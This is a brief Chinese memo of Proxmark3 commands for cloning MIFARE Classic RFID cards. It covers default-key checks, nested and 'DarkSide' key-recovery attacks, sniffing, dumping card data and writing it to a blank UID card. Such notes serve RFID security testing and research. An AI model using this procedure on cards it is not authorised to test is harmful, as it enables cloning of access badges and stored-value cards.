PM3使用简要流程 备忘

Proxmark3_裸板

1、简单复制

读取UID,仅复制UID

2、测试是否存在默认密码

hf mf chk *1 ? t

如果存在,使用hf mf nested获取所有密钥

3、如果不存在默认密码,使用

hf mf mifare 基于PRNG漏洞,执行mifare “DarkSide”攻击操作

发现密钥,如果一次未发现,需要重复执行多次。

4、针对全加密卡,窃听,嗅探

hf 14a snoop

hf 14a list

5、获取所有密钥

hf mf nested 1 0 A ffffffffffff d 导出所有密钥到dumpkeys.bin

6、读取卡内信息导出到dumpdata.bin

hf mf dump  (.bin是二进制文件)

然后使用pm3_mfd2eml.py转换成.eml文件  (.eml文件是文本文件)

7、使用 hf mf cload xxx.eml 将eml文件内容写入空白UID卡(hf mf cload命令只识别以当前0区块前7位命名的文件名)

注意:存在BUG,eml文件不能是e开头!